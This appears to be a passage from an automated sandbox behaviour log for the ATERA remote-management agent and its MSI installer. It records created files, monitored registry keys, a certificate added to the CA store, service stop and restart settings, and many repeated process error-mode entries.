                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Microsoft.Win32.TaskScheduler.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.Win32.TaskScheduler.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgent
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF188A524 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,37_2_00007FFDF188A524
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_USERS.DEFAULT\Software\Microsoft\SystemCertificates\CA
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeRegistry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
